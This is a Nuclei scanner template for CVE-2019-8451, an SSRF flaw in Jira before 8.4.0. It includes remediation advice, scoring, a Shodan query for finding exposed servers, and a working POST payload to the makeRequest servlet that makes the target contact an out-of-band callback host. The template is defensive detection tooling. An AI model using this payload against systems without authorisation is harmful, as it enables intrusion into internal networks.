id: CVE-2019-8451 info: name: Jira <8.4.0 - Server-Side Request Forgery author: TechbrunchFR severity: medium description: Jira before 8.4.0 is susceptible to server-side request forgery. The /plugins/servlet/gadgets/makeRequest resource contains a logic bug in the JiraWhitelist class, which can allow an attacker to access the content of internal network resources and thus modify data, and/or execute unauthorized operations. remediation: | Upgrade Jira to version 8.4.0 or later to mitigate the SSRF vulnerability. reference: - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://jira.atlassian.com/browse/JRASERVER-69793 - https://hackerone.com/reports/713900 - https://nvd.nist.gov/vuln/detail/CVE-2019-8451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2019-8451 cwe-id: CWE-918 epss-score: 0.97115 epss-percentile: 0.99729 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: jira_server shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira,ssrf,oast,tenable,hackerone,cve,cve2019 http: - method: POST path: - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest' body: | url=https://{{Host}}:443@{{interactsh-url}} headers: X-Atlassian-Token: no-check Content-Type: application/x-www-form-urlencoded matchers: - type: word part: interactsh_protocol words: - "http" # Confirms the HTTP Interaction # digest: 4a0a00473045022100b288f40c9752a5ad276ffc10bb4098cd63d83bcba9f24047efc19aa2be964e6402200e1d80a793196f6576684a8d3a95a423749a9ebc7d76401faa7879d681338624:922c64590222798bb761d5b6d8e72950